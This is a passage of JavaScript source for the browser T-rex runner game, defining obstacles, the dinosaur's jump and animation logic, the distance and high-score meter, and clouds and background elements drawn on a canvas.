Obstacle.MAX_OBSTACLE_LENGTH = 3;


Obstacle.prototype = {
  /**
   * Initialise the DOM for the obstacle.
   * @param {number} speed
   */
  init(speed) {
    this.cloneCollisionBoxes();

    // Only allow sizing if we're at the right speed.
    if (this.size > 1 && this.typeConfig.multipleSpeed > speed) {
      this.size = 1;
    }

    this.width = this.typeConfig.width * this.size;

    // Check if obstacle can be positioned at various heights.
    if (Array.isArray(this.typeConfig.yPos)) {
      const yPosConfig =
          IS_MOBILE ? this.typeConfig.yPosMobile : this.typeConfig.yPos;
      this.yPos = yPosConfig[getRandomNum(0, yPosConfig.length - 1)];
    } else {
      this.yPos = this.typeConfig.yPos;
    }

    this.draw();

    // Make collision box adjustments,
    // Central box is adjusted to the size as one box.
    //      ____        ______        ________
    //    _|   |-|    _|     |-|    _|       |-|
    //   | |<->| |   | |<--->| |   | |<----->| |
    //   | | 1 | |   | |  2  | |   | |   3   | |
    //   |_|___|_|   |_|_____|_|   |_|_______|_|
    //
    if (this.size > 1) {
      this.collisionBoxes[1].width = this.width - this.collisionBoxes[0].width -
          this.collisionBoxes[2].width;
      this.collisionBoxes[2].x = this.width - this.collisionBoxes[2].width;
    }

    // For obstacles that go at a different speed from the horizon.
    if (this.typeConfig.speedOffset) {
      this.speedOffset = Math.random() > 0.5 ? this.typeConfig.speedOffset :
                                               -this.typeConfig.speedOffset;
    }

    this.gap = this.getGap(this.gapCoefficient, speed);

    // Increase gap for audio cues enabled.
    if (Runner.audioCues) {
      this.gap *= 2;
    }
  },

  /**
   * Draw and crop based on size.
   */
  draw() {
    let sourceWidth = this.typeConfig.width;
    let sourceHeight = this.typeConfig.height;

    if (IS_HIDPI) {
      sourceWidth = sourceWidth * 2;
      sourceHeight = sourceHeight * 2;
    }

    // X position in sprite.
    let sourceX =
        (sourceWidth * this.size) * (0.5 * (this.size - 1)) + this.spritePos.x;

    // Animation frames.
    if (this.currentFrame > 0) {
      sourceX += sourceWidth * this.currentFrame;
    }

    this.canvasCtx.drawImage(
        this.imageSprite, sourceX, this.spritePos.y, sourceWidth * this.size,
        sourceHeight, this.xPos, this.yPos, this.typeConfig.width * this.size,
        this.typeConfig.height);
  },

  /**
   * Obstacle frame update.
   * @param {number} deltaTime
   * @param {number} speed
   */
  update(deltaTime, speed) {
    if (!this.remove) {
      if (this.typeConfig.speedOffset) {
        speed += this.speedOffset;
      }
      this.xPos -= Math.floor((speed * FPS / 1000) * deltaTime);

      // Update frame
      if (this.typeConfig.numFrames) {
        this.timer += deltaTime;
        if (this.timer >= this.typeConfig.frameRate) {
          this.currentFrame =
              this.currentFrame === this.typeConfig.numFrames - 1 ?
              0 :
              this.currentFrame + 1;
          this.timer = 0;
        }
      }
      this.draw();

      if (!this.isVisible()) {
        this.remove = true;
      }
    }
  },

  /**
   * Calculate a random gap size.
   * - Minimum gap gets wider as speed increses
   * @param {number} gapCoefficient
   * @param {number} speed
   * @return {number} The gap size.
   */
  getGap(gapCoefficient, speed) {
    const minGap = Math.round(
        this.width * speed + this.typeConfig.minGap * gapCoefficient);
    const maxGap = Math.round(minGap * Obstacle.MAX_GAP_COEFFICIENT);
    return getRandomNum(minGap, maxGap);
  },

  /**
   * Check if obstacle is visible.
   * @return {boolean} Whether the obstacle is in the game area.
   */
  isVisible() {
    return this.xPos + this.width > 0;
  },

  /**
   * Make a copy of the collision boxes, since these will change based on
   * obstacle type and size.
   */
  cloneCollisionBoxes() {
    const collisionBoxes = this.typeConfig.collisionBoxes;

    for (let i = collisionBoxes.length - 1; i >= 0; i--) {
      this.collisionBoxes[i] = new CollisionBox(
          collisionBoxes[i].x, collisionBoxes[i].y, collisionBoxes[i].width,
          collisionBoxes[i].height);
    }
  },
};


//******************************************************************************
/**
 * T-rex game character.
 * @param {HTMLCanvasElement} canvas
 * @param {Object} spritePos Positioning within image sprite.
 * @constructor
 */
function Trex(canvas, spritePos) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.spritePos = spritePos;
  this.xPos = 0;
  this.yPos = 0;
  this.xInitialPos = 0;
  // Position when on the ground.
  this.groundYPos = 0;
  this.currentFrame = 0;
  this.currentAnimFrames = [];
  this.blinkDelay = 0;
  this.blinkCount = 0;
  this.animStartTime = 0;
  this.timer = 0;
  this.msPerFrame = 1000 / FPS;
  this.config = Object.assign(Trex.config, Trex.normalJumpConfig);
  // Current status.
  this.status = Trex.status.WAITING;
  this.jumping = false;
  this.ducking = false;
  this.jumpVelocity = 0;
  this.reachedMinHeight = false;
  this.speedDrop = false;
  this.jumpCount = 0;
  this.jumpspotX = 0;
  this.altGameModeEnabled = false;
  this.flashing = false;

  this.init();
}


/**
 * T-rex player config.
 */
Trex.config = {
  DROP_VELOCITY: -5,
  FLASH_OFF: 175,
  FLASH_ON: 100,
  HEIGHT: 47,
  HEIGHT_DUCK: 25,
  INTRO_DURATION: 1500,
  SPEED_DROP_COEFFICIENT: 3,
  SPRITE_WIDTH: 262,
  START_X_POS: 50,
  WIDTH: 44,
  WIDTH_DUCK: 59,
};

Trex.slowJumpConfig = {
  GRAVITY: 0.25,
  MAX_JUMP_HEIGHT: 50,
  MIN_JUMP_HEIGHT: 45,
  INITIAL_JUMP_VELOCITY: -20,
};

Trex.normalJumpConfig = {
  GRAVITY: 0.6,
  MAX_JUMP_HEIGHT: 30,
  MIN_JUMP_HEIGHT: 30,
  INITIAL_JUMP_VELOCITY: -10,
};

/**
 * Used in collision detection.
 * @enum {Array<CollisionBox>}
 */
Trex.collisionBoxes = {
  DUCKING: [new CollisionBox(1, 18, 55, 25)],
  RUNNING: [
    new CollisionBox(22, 0, 17, 16),
    new CollisionBox(1, 18, 30, 9),
    new CollisionBox(10, 35, 14, 8),
    new CollisionBox(1, 24, 29, 5),
    new CollisionBox(5, 30, 21, 4),
    new CollisionBox(9, 34, 15, 4),
  ],
};


/**
 * Animation states.
 * @enum {string}
 */
Trex.status = {
  CRASHED: 'CRASHED',
  DUCKING: 'DUCKING',
  JUMPING: 'JUMPING',
  RUNNING: 'RUNNING',
  WAITING: 'WAITING',
};

/**
 * Blinking coefficient.
 * @const
 */
Trex.BLINK_TIMING = 7000;


/**
 * Animation config for different states.
 * @enum {Object}
 */
Trex.animFrames = {
  WAITING: {
    frames: [44, 0],
    msPerFrame: 1000 / 3,
  },
  RUNNING: {
    frames: [88, 132],
    msPerFrame: 1000 / 12,
  },
  CRASHED: {
    frames: [220],
    msPerFrame: 1000 / 60,
  },
  JUMPING: {
    frames: [0],
    msPerFrame: 1000 / 60,
  },
  DUCKING: {
    frames: [264, 323],
    msPerFrame: 1000 / 8,
  },
};


Trex.prototype = {
  /**
   * T-rex player initaliser.
   * Sets the t-rex to blink at random intervals.
   */
  init() {
    this.groundYPos = Runner.defaultDimensions.HEIGHT - this.config.HEIGHT -
        Runner.config.BOTTOM_PAD;
    this.yPos = this.groundYPos;
    this.minJumpHeight = this.groundYPos - this.config.MIN_JUMP_HEIGHT;

    this.draw(0, 0);
    this.update(0, Trex.status.WAITING);
  },

  /**
   * Assign the appropriate jump parameters based on the game speed.
   */
  enableSlowConfig: function() {
    const jumpConfig =
        Runner.slowDown ? Trex.slowJumpConfig : Trex.normalJumpConfig;
    Trex.config = Object.assign(Trex.config, jumpConfig);

    this.adjustAltGameConfigForSlowSpeed();
  },

  /**
   * Enables the alternative game. Redefines the dino config.
   * @param {Object} spritePos New positioning within image sprite.
   */
  enableAltGameMode: function(spritePos) {
    this.altGameModeEnabled = true;
    this.spritePos = spritePos;
    const spriteDefinition = Runner.spriteDefinition['TREX'];

    // Update animation frames.
    Trex.animFrames.RUNNING.frames =
        [spriteDefinition.RUNNING_1.x, spriteDefinition.RUNNING_2.x];
    Trex.animFrames.CRASHED.frames = [spriteDefinition.CRASHED.x];

    if (typeof spriteDefinition.JUMPING.x == 'object') {
      Trex.animFrames.JUMPING.frames = spriteDefinition.JUMPING.x;
    } else {
      Trex.animFrames.JUMPING.frames = [spriteDefinition.JUMPING.x];
    }

    Trex.animFrames.DUCKING.frames =
        [spriteDefinition.RUNNING_1.x, spriteDefinition.RUNNING_2.x];

    // Update Trex config
    Trex.config.GRAVITY = spriteDefinition.GRAVITY || Trex.config.GRAVITY;
    Trex.config.HEIGHT = spriteDefinition.RUNNING_1.h,
    Trex.config.INITIAL_JUMP_VELOCITY = spriteDefinition.INITIAL_JUMP_VELOCITY;
    Trex.config.MAX_JUMP_HEIGHT = spriteDefinition.MAX_JUMP_HEIGHT;
    Trex.config.MIN_JUMP_HEIGHT = spriteDefinition.MIN_JUMP_HEIGHT;
    Trex.config.WIDTH = spriteDefinition.RUNNING_1.w;
    Trex.config.WIDTH_JUMP = spriteDefinition.JUMPING.w;
    Trex.config.INVERT_JUMP = spriteDefinition.INVERT_JUMP;

    this.adjustAltGameConfigForSlowSpeed(spriteDefinition.GRAVITY);
    this.config = Trex.config;

    // Adjust bottom horizon placement.
    this.groundYPos = Runner.defaultDimensions.HEIGHT - this.config.HEIGHT -
        Runner.spriteDefinition['BOTTOM_PAD'];
    this.yPos = this.groundYPos;
    this.reset();
  },

  /**
   * Slow speeds adjustments for the alt game modes.
   * @param {number=} opt_gravityValue
   */
  adjustAltGameConfigForSlowSpeed: function(opt_gravityValue) {
    if (Runner.slowDown) {
      if (opt_gravityValue) {
        Trex.config.GRAVITY = opt_gravityValue / 1.5;
      }
      Trex.config.MIN_JUMP_HEIGHT *= 1.5;
      Trex.config.MAX_JUMP_HEIGHT *= 1.5;
      Trex.config.INITIAL_JUMP_VELOCITY =
          Trex.config.INITIAL_JUMP_VELOCITY * 1.5;
    }
  },

  /**
   * Setter whether dino is flashing.
   * @param {boolean} status
   */
  setFlashing: function(status) {
    this.flashing = status;
  },

  /**
   * Setter for the jump velocity.
   * The approriate drop velocity is also set.
   * @param {number} setting
   */
  setJumpVelocity(setting) {
    this.config.INITIAL_JUMP_VELOCITY = -setting;
    this.config.DROP_VELOCITY = -setting / 2;
  },

  /**
   * Set the animation status.
   * @param {!number} deltaTime
   * @param {Trex.status=} opt_status Optional status to switch to.
   */
  update(deltaTime, opt_status) {
    this.timer += deltaTime;

    // Update the status.
    if (opt_status) {
      this.status = opt_status;
      this.currentFrame = 0;
      this.msPerFrame = Trex.animFrames[opt_status].msPerFrame;
      this.currentAnimFrames = Trex.animFrames[opt_status].frames;

      if (opt_status === Trex.status.WAITING) {
        this.animStartTime = getTimeStamp();
        this.setBlinkDelay();
      }
    }
    // Game intro animation, T-rex moves in from the left.
    if (this.playingIntro && this.xPos < this.config.START_X_POS) {
      this.xPos += Math.round((this.config.START_X_POS /
          this.config.INTRO_DURATION) * deltaTime);
      this.xInitialPos = this.xPos;
    }

    if (this.status === Trex.status.WAITING) {
      this.blink(getTimeStamp());
    } else {
      this.draw(this.currentAnimFrames[this.currentFrame], 0);
    }

    // Update the frame position.
    if (!this.flashing && this.timer >= this.msPerFrame) {
      this.currentFrame = this.currentFrame ==
          this.currentAnimFrames.length - 1 ? 0 : this.currentFrame + 1;
      this.timer = 0;
    }

    if (!this.altGameModeEnabled) {
      // Speed drop becomes duck if the down key is still being pressed.
      if (this.speedDrop && this.yPos === this.groundYPos) {
        this.speedDrop = false;
        this.setDuck(true);
      }
    }
  },

  /**
   * Draw the t-rex to a particular position.
   * @param {number} x
   * @param {number} y
   */
  draw(x, y) {
    let sourceX = x;
    let sourceY = y;
    let sourceWidth = this.ducking && this.status !== Trex.status.CRASHED ?
        this.config.WIDTH_DUCK :
        this.config.WIDTH;
    let sourceHeight = this.config.HEIGHT;
    const outputHeight = sourceHeight;

    let jumpOffset = Runner.spriteDefinition.TREX.JUMPING.xOffset;

    // Width of sprite changes on jump.
    if (this.altGameModeEnabled && this.jumping &&
        this.status !== Trex.status.CRASHED) {
      sourceWidth = this.config.WIDTH_JUMP;
    }

    if (IS_HIDPI) {
      sourceX *= 2;
      sourceY *= 2;
      sourceWidth *= 2;
      sourceHeight *= 2;
      jumpOffset *= 2;
    }

    // Adjustments for sprite sheet position.
    sourceX += this.spritePos.x;
    sourceY += this.spritePos.y;

    // Flashing.
    if (this.flashing) {
      if (this.timer < this.config.FLASH_ON) {
        this.canvasCtx.globalAlpha = 0.5;
      } else if (this.timer > this.config.FLASH_OFF) {
        this.timer = 0;
      }
    }

    // Ducking.
    if (!this.altGameModeEnabled && this.ducking &&
        this.status !== Trex.status.CRASHED) {
      this.canvasCtx.drawImage(Runner.imageSprite, sourceX, sourceY,
          sourceWidth, sourceHeight,
          this.xPos, this.yPos,
          this.config.WIDTH_DUCK, outputHeight);
    } else if (
        this.altGameModeEnabled && this.jumping &&
        this.status !== Trex.status.CRASHED) {
      // Jumping with adjustments.
      this.canvasCtx.drawImage(
          Runner.imageSprite, sourceX, sourceY, sourceWidth, sourceHeight,
          this.xPos - jumpOffset, this.yPos, this.config.WIDTH_JUMP,
          outputHeight);
    } else {
      // Crashed whilst ducking. Trex is standing up so needs adjustment.
      if (this.ducking && this.status === Trex.status.CRASHED) {
        this.xPos++;
      }
      // Standing / running
      this.canvasCtx.drawImage(Runner.imageSprite, sourceX, sourceY,
          sourceWidth, sourceHeight,
          this.xPos, this.yPos,
          this.config.WIDTH, outputHeight);
    }
    this.canvasCtx.globalAlpha = 1;
  },

  /**
   * Sets a random time for the blink to happen.
   */
  setBlinkDelay() {
    this.blinkDelay = Math.ceil(Math.random() * Trex.BLINK_TIMING);
  },

  /**
   * Make t-rex blink at random intervals.
   * @param {number} time Current time in milliseconds.
   */
  blink(time) {
    const deltaTime = time - this.animStartTime;

    if (deltaTime >= this.blinkDelay) {
      this.draw(this.currentAnimFrames[this.currentFrame], 0);

      if (this.currentFrame === 1) {
        // Set new random delay to blink.
        this.setBlinkDelay();
        this.animStartTime = time;
        this.blinkCount++;
      }
    }
  },

  /**
   * Initialise a jump.
   * @param {number} speed
   */
  startJump(speed) {
    if (!this.jumping) {
      this.update(0, Trex.status.JUMPING);
      // Tweak the jump velocity based on the speed.
      this.jumpVelocity = this.config.INITIAL_JUMP_VELOCITY - (speed / 10);
      this.jumping = true;
      this.reachedMinHeight = false;
      this.speedDrop = false;

      if (this.config.INVERT_JUMP) {
        this.minJumpHeight = this.groundYPos + this.config.MIN_JUMP_HEIGHT;
      }
    }
  },

  /**
   * Jump is complete, falling down.
   */
  endJump() {
    if (this.reachedMinHeight &&
        this.jumpVelocity < this.config.DROP_VELOCITY) {
      this.jumpVelocity = this.config.DROP_VELOCITY;
    }
  },

  /**
   * Update frame for a jump.
   * @param {number} deltaTime
   */
  updateJump(deltaTime) {
    const msPerFrame = Trex.animFrames[this.status].msPerFrame;
    const framesElapsed = deltaTime / msPerFrame;

    // Speed drop makes Trex fall faster.
    if (this.speedDrop) {
      this.yPos += Math.round(this.jumpVelocity *
          this.config.SPEED_DROP_COEFFICIENT * framesElapsed);
    } else if (this.config.INVERT_JUMP) {
      this.yPos -= Math.round(this.jumpVelocity * framesElapsed);
    } else {
      this.yPos += Math.round(this.jumpVelocity * framesElapsed);
    }

    this.jumpVelocity += this.config.GRAVITY * framesElapsed;

    // Minimum height has been reached.
    if (this.config.INVERT_JUMP && (this.yPos > this.minJumpHeight) ||
        !this.config.INVERT_JUMP && (this.yPos < this.minJumpHeight) ||
        this.speedDrop) {
      this.reachedMinHeight = true;
    }

    // Reached max height.
    if (this.config.INVERT_JUMP && (this.yPos > -this.config.MAX_JUMP_HEIGHT) ||
        !this.config.INVERT_JUMP && (this.yPos < this.config.MAX_JUMP_HEIGHT) ||
        this.speedDrop) {
      this.endJump();
    }

    // Back down at ground level. Jump completed.
    if ((this.config.INVERT_JUMP && this.yPos) < this.groundYPos ||
        (!this.config.INVERT_JUMP && this.yPos) > this.groundYPos) {
      this.reset();
      this.jumpCount++;

      if (Runner.audioCues) {
        Runner.generatedSoundFx.loopFootSteps();
      }
    }
  },

  /**
   * Set the speed drop. Immediately cancels the current jump.
   */
  setSpeedDrop() {
    this.speedDrop = true;
    this.jumpVelocity = 1;
  },

  /**
   * @param {boolean} isDucking
   */
  setDuck(isDucking) {
    if (isDucking && this.status !== Trex.status.DUCKING) {
      this.update(0, Trex.status.DUCKING);
      this.ducking = true;
    } else if (this.status === Trex.status.DUCKING) {
      this.update(0, Trex.status.RUNNING);
      this.ducking = false;
    }
  },

  /**
   * Reset the t-rex to running at start of game.
   */
  reset() {
    this.xPos = this.xInitialPos;
    this.yPos = this.groundYPos;
    this.jumpVelocity = 0;
    this.jumping = false;
    this.ducking = false;
    this.update(0, Trex.status.RUNNING);
    this.midair = false;
    this.speedDrop = false;
    this.jumpCount = 0;
  },
};


//******************************************************************************

/**
 * Handles displaying the distance meter.
 * @param {!HTMLCanvasElement} canvas
 * @param {Object} spritePos Image position in sprite.
 * @param {number} canvasWidth
 * @constructor
 */
function DistanceMeter(canvas, spritePos, canvasWidth) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.image = Runner.imageSprite;
  this.spritePos = spritePos;
  this.x = 0;
  this.y = 5;

  this.currentDistance = 0;
  this.maxScore = 0;
  this.highScore = '0';
  this.container = null;

  this.digits = [];
  this.achievement = false;
  this.defaultString = '';
  this.flashTimer = 0;
  this.flashIterations = 0;
  this.invertTrigger = false;
  this.flashingRafId = null;
  this.highScoreBounds = {};
  this.highScoreFlashing = false;

  this.config = DistanceMeter.config;
  this.maxScoreUnits = this.config.MAX_DISTANCE_UNITS;
  this.canvasWidth = canvasWidth;
  this.init(canvasWidth);
}


/**
 * @enum {number}
 */
DistanceMeter.dimensions = {
  WIDTH: 10,
  HEIGHT: 13,
  DEST_WIDTH: 11,
};


/**
 * Y positioning of the digits in the sprite sheet.
 * X position is always 0.
 * @type {Array<number>}
 */
DistanceMeter.yPos = [0, 13, 27, 40, 53, 67, 80, 93, 107, 120];


/**
 * Distance meter config.
 * @enum {number}
 */
DistanceMeter.config = {
  // Number of digits.
  MAX_DISTANCE_UNITS: 5,

  // Distance that causes achievement animation.
  ACHIEVEMENT_DISTANCE: 100,

  // Used for conversion from pixel distance to a scaled unit.
  COEFFICIENT: 0.025,

  // Flash duration in milliseconds.
  FLASH_DURATION: 1000 / 4,

  // Flash iterations for achievement animation.
  FLASH_ITERATIONS: 3,

  // Padding around the high score hit area.
  HIGH_SCORE_HIT_AREA_PADDING: 4,
};


DistanceMeter.prototype = {
  /**
   * Initialise the distance meter to '00000'.
   * @param {number} width Canvas width in px.
   */
  init(width) {
    let maxDistanceStr = '';

    this.calcXPos(width);
    this.maxScore = this.maxScoreUnits;
    for (let i = 0; i < this.maxScoreUnits; i++) {
      this.draw(i, 0);
      this.defaultString += '0';
      maxDistanceStr += '9';
    }

    this.maxScore = parseInt(maxDistanceStr, 10);
  },

  /**
   * Calculate the xPos in the canvas.
   * @param {number} canvasWidth
   */
  calcXPos(canvasWidth) {
    this.x = canvasWidth - (DistanceMeter.dimensions.DEST_WIDTH *
        (this.maxScoreUnits + 1));
  },

  /**
   * Draw a digit to canvas.
   * @param {number} digitPos Position of the digit.
   * @param {number} value Digit value 0-9.
   * @param {boolean=} opt_highScore Whether drawing the high score.
   */
  draw(digitPos, value, opt_highScore) {
    let sourceWidth = DistanceMeter.dimensions.WIDTH;
    let sourceHeight = DistanceMeter.dimensions.HEIGHT;
    let sourceX = DistanceMeter.dimensions.WIDTH * value;
    let sourceY = 0;

    const targetX = digitPos * DistanceMeter.dimensions.DEST_WIDTH;
    const targetY = this.y;
    const targetWidth = DistanceMeter.dimensions.WIDTH;
    const targetHeight = DistanceMeter.dimensions.HEIGHT;

    // For high DPI we 2x source values.
    if (IS_HIDPI) {
      sourceWidth *= 2;
      sourceHeight *= 2;
      sourceX *= 2;
    }

    sourceX += this.spritePos.x;
    sourceY += this.spritePos.y;

    this.canvasCtx.save();

    if (IS_RTL) {
      if (opt_highScore) {
        this.canvasCtx.translate(
            this.canvasWidth -
                (DistanceMeter.dimensions.WIDTH * (this.maxScoreUnits + 3)),
            this.y);
      } else {
        this.canvasCtx.translate(
            this.canvasWidth - DistanceMeter.dimensions.WIDTH, this.y);
      }
      this.canvasCtx.scale(-1, 1);
    } else {
      const highScoreX =
          this.x - (this.maxScoreUnits * 2) * DistanceMeter.dimensions.WIDTH;
      if (opt_highScore) {
        this.canvasCtx.translate(highScoreX, this.y);
      } else {
        this.canvasCtx.translate(this.x, this.y);
      }
    }

    this.canvasCtx.drawImage(
        this.image,
        sourceX,
        sourceY,
        sourceWidth,
        sourceHeight,
        targetX,
        targetY,
        targetWidth,
        targetHeight,
    );

    this.canvasCtx.restore();
  },

  /**
   * Covert pixel distance to a 'real' distance.
   * @param {number} distance Pixel distance ran.
   * @return {number} The 'real' distance ran.
   */
  getActualDistance(distance) {
    return distance ? Math.round(distance * this.config.COEFFICIENT) : 0;
  },

  /**
   * Update the distance meter.
   * @param {number} distance
   * @param {number} deltaTime
   * @return {boolean} Whether the acheivement sound fx should be played.
   */
  update(deltaTime, distance) {
    let paint = true;
    let playSound = false;

    if (!this.achievement) {
      distance = this.getActualDistance(distance);
      // Score has gone beyond the initial digit count.
      if (distance > this.maxScore && this.maxScoreUnits ==
        this.config.MAX_DISTANCE_UNITS) {
        this.maxScoreUnits++;
        this.maxScore = parseInt(this.maxScore + '9', 10);
      } else {
        this.distance = 0;
      }

      if (distance > 0) {
        // Achievement unlocked.
        if (distance % this.config.ACHIEVEMENT_DISTANCE === 0) {
          // Flash score and play sound.
          this.achievement = true;
          this.flashTimer = 0;
          playSound = true;
        }

        // Create a string representation of the distance with leading 0.
        const distanceStr = (this.defaultString +
            distance).substr(-this.maxScoreUnits);
        this.digits = distanceStr.split('');
      } else {
        this.digits = this.defaultString.split('');
      }
    } else {
      // Control flashing of the score on reaching acheivement.
      if (this.flashIterations <= this.config.FLASH_ITERATIONS) {
        this.flashTimer += deltaTime;

        if (this.flashTimer < this.config.FLASH_DURATION) {
          paint = false;
        } else if (this.flashTimer > this.config.FLASH_DURATION * 2) {
          this.flashTimer = 0;
          this.flashIterations++;
        }
      } else {
        this.achievement = false;
        this.flashIterations = 0;
        this.flashTimer = 0;
      }
    }

    // Draw the digits if not flashing.
    if (paint) {
      for (let i = this.digits.length - 1; i >= 0; i--) {
        this.draw(i, parseInt(this.digits[i], 10));
      }
    }

    this.drawHighScore();
    return playSound;
  },

  /**
   * Draw the high score.
   */
  drawHighScore() {
    if (parseInt(this.highScore, 10) > 0) {
      this.canvasCtx.save();
      this.canvasCtx.globalAlpha = .8;
      for (let i = this.highScore.length - 1; i >= 0; i--) {
        this.draw(i, parseInt(this.highScore[i], 10), true);
      }
      this.canvasCtx.restore();
    }
  },

  /**
   * Set the highscore as a array string.
   * Position of char in the sprite: H - 10, I - 11.
   * @param {number} distance Distance ran in pixels.
   */
  setHighScore(distance) {
    distance = this.getActualDistance(distance);
    const highScoreStr = (this.defaultString +
        distance).substr(-this.maxScoreUnits);

    this.highScore = ['10', '11', ''].concat(highScoreStr.split(''));
  },


  /**
   * Whether a clicked is in the high score area.
   * @param {Event} e Event object.
   * @return {boolean} Whether the click was in the high score bounds.
   */
  hasClickedOnHighScore(e) {
    let x = 0;
    let y = 0;

    if (e.touches) {
      // Bounds for touch differ from pointer.
      const canvasBounds = this.canvas.getBoundingClientRect();
      x = e.touches[0].clientX - canvasBounds.left;
      y = e.touches[0].clientY - canvasBounds.top;
    } else {
      x = e.offsetX;
      y = e.offsetY;
    }

    this.highScoreBounds = this.getHighScoreBounds();
    return x >= this.highScoreBounds.x && x <=
        this.highScoreBounds.x + this.highScoreBounds.width &&
        y >= this.highScoreBounds.y && y <=
        this.highScoreBounds.y + this.highScoreBounds.height;
  },

  /**
   * Get the bounding box for the high score.
   * @return {Object} Object with x, y, width and height properties.
   */
  getHighScoreBounds() {
    return {
      x: (this.x - (this.maxScoreUnits * 2) * DistanceMeter.dimensions.WIDTH) -
          DistanceMeter.config.HIGH_SCORE_HIT_AREA_PADDING,
      y: this.y,
      width: DistanceMeter.dimensions.WIDTH * (this.highScore.length + 1) +
          DistanceMeter.config.HIGH_SCORE_HIT_AREA_PADDING,
      height: DistanceMeter.dimensions.HEIGHT +
          (DistanceMeter.config.HIGH_SCORE_HIT_AREA_PADDING * 2),
    };
  },

  /**
   * Animate flashing the high score to indicate ready for resetting.
   * The flashing stops following this.config.FLASH_ITERATIONS x 2 flashes.
   */
  flashHighScore() {
    const now = getTimeStamp();
    const deltaTime = now - (this.frameTimeStamp || now);
    let paint = true;
    this.frameTimeStamp = now;

    // Reached the max number of flashes.
    if (this.flashIterations > this.config.FLASH_ITERATIONS * 2) {
      this.cancelHighScoreFlashing();
      return;
    }

    this.flashTimer += deltaTime;

    if (this.flashTimer < this.config.FLASH_DURATION) {
      paint = false;
    } else if (this.flashTimer > this.config.FLASH_DURATION * 2) {
      this.flashTimer = 0;
      this.flashIterations++;
    }

    if (paint) {
      this.drawHighScore();
    } else {
      this.clearHighScoreBounds();
    }
    // Frame update.
    this.flashingRafId =
        requestAnimationFrame(this.flashHighScore.bind(this));
  },

  /**
   * Draw empty rectangle over high score.
   */
  clearHighScoreBounds() {
    this.canvasCtx.save();
    this.canvasCtx.fillStyle = '#fff';
    this.canvasCtx.rect(this.highScoreBounds.x, this.highScoreBounds.y,
        this.highScoreBounds.width, this.highScoreBounds.height);
    this.canvasCtx.fill();
    this.canvasCtx.restore();
  },

  /**
   * Starts the flashing of the high score.
   */
  startHighScoreFlashing() {
    this.highScoreFlashing = true;
    this.flashHighScore();
  },

  /**
   * Whether high score is flashing.
   * @return {boolean}
   */
  isHighScoreFlashing() {
    return this.highScoreFlashing;
  },

  /**
   * Stop flashing the high score.
   */
  cancelHighScoreFlashing() {
    if (this.flashingRafId) {
      cancelAnimationFrame(this.flashingRafId);
    }
    this.flashIterations = 0;
    this.flashTimer = 0;
    this.highScoreFlashing = false;
    this.clearHighScoreBounds();
    this.drawHighScore();
  },

  /**
   * Clear the high score.
   */
  resetHighScore() {
    this.setHighScore(0);
    this.cancelHighScoreFlashing();
  },

  /**
   * Reset the distance meter back to '00000'.
   */
  reset() {
    this.update(0, 0);
    this.achievement = false;
  },
};


//******************************************************************************

/**
 * Cloud background item.
 * Similar to an obstacle object but without collision boxes.
 * @param {HTMLCanvasElement} canvas Canvas element.
 * @param {Object} spritePos Position of image in sprite.
 * @param {number} containerWidth
 * @constructor
 */
function Cloud(canvas, spritePos, containerWidth) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
  this.spritePos = spritePos;
  this.containerWidth = containerWidth;
  this.xPos = containerWidth;
  this.yPos = 0;
  this.remove = false;
  this.gap =
      getRandomNum(Cloud.config.MIN_CLOUD_GAP, Cloud.config.MAX_CLOUD_GAP);

  this.init();
}


/**
 * Cloud object config.
 * @enum {number}
 */
Cloud.config = {
  HEIGHT: 14,
  MAX_CLOUD_GAP: 400,
  MAX_SKY_LEVEL: 30,
  MIN_CLOUD_GAP: 100,
  MIN_SKY_LEVEL: 71,
  WIDTH: 46,
};


Cloud.prototype = {
  /**
   * Initialise the cloud. Sets the Cloud height.
   */
  init() {
    this.yPos = getRandomNum(Cloud.config.MAX_SKY_LEVEL,
        Cloud.config.MIN_SKY_LEVEL);
    this.draw();
  },

  /**
   * Draw the cloud.
   */
  draw() {
    this.canvasCtx.save();
    let sourceWidth = Cloud.config.WIDTH;
    let sourceHeight = Cloud.config.HEIGHT;
    const outputWidth = sourceWidth;
    const outputHeight = sourceHeight;
    if (IS_HIDPI) {
      sourceWidth = sourceWidth * 2;
      sourceHeight = sourceHeight * 2;
    }

    this.canvasCtx.drawImage(Runner.imageSprite, this.spritePos.x,
        this.spritePos.y,
        sourceWidth, sourceHeight,
        this.xPos, this.yPos,
        outputWidth, outputHeight);

    this.canvasCtx.restore();
  },

  /**
   * Update the cloud position.
   * @param {number} speed
   */
  update(speed) {
    if (!this.remove) {
      this.xPos -= Math.ceil(speed);
      this.draw();

      // Mark as removeable if no longer in the canvas.
      if (!this.isVisible()) {
        this.remove = true;
      }
    }
  },

  /**
   * Check if the cloud is visible on the stage.
   * @return {boolean}
   */
  isVisible() {
    return this.xPos + Cloud.config.WIDTH > 0;
  },
};


/**
 * Background item.
 * Similar to cloud, without random y position.
 * @param {HTMLCanvasElement} canvas Canvas element.
 * @param {Object} spritePos Position of image in sprite.
 * @param {number} containerWidth
 * @param {string} type Element type.
 * @constructor
 */
function BackgroundEl(canvas, spritePos, containerWidth, type) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
  this.spritePos = spritePos;
  this.containerWidth = containerWidth;
  this.xPos = containerWidth;
  this.yPos = 0;
  this.remove = false;
  this.type = type;
  this.gap =
      getRandomNum(BackgroundEl.config.MIN_GAP, BackgroundEl.config.MAX_GAP);
  this.animTimer = 0;
  this.switchFrames = false;

  this.spriteConfig = {};
  this.init();
}

/**
 * Background element object config.
 * Real values assigned when game type changes.
 * @enum {number}
 */
BackgroundEl.config = {
  MAX_BG_ELS: 0,
  MAX_GAP: 0,
  MIN_GAP: 0,
  POS: 0,
  SPEED: 0,
  Y_POS: 0,
  MS_PER_FRAME: 0,  // only needed when BACKGROUND_EL.FIXED is true
};


BackgroundEl.prototype = {
  /**
   * Initialise the element setting the y position.
   */
  init() {
    this.spriteConfig = Runner.spriteDefinition.BACKGROUND_EL[this.type];
    if (this.spriteConfig.FIXED) {
      this.xPos = this.spriteConfig.FIXED_X_POS;
    }
    this.yPos = BackgroundEl.config.Y_POS - this.spriteConfig.HEIGHT +
        this.spriteConfig.OFFSET;
    this.draw();
  },

  /**
   * Draw the element.
   */
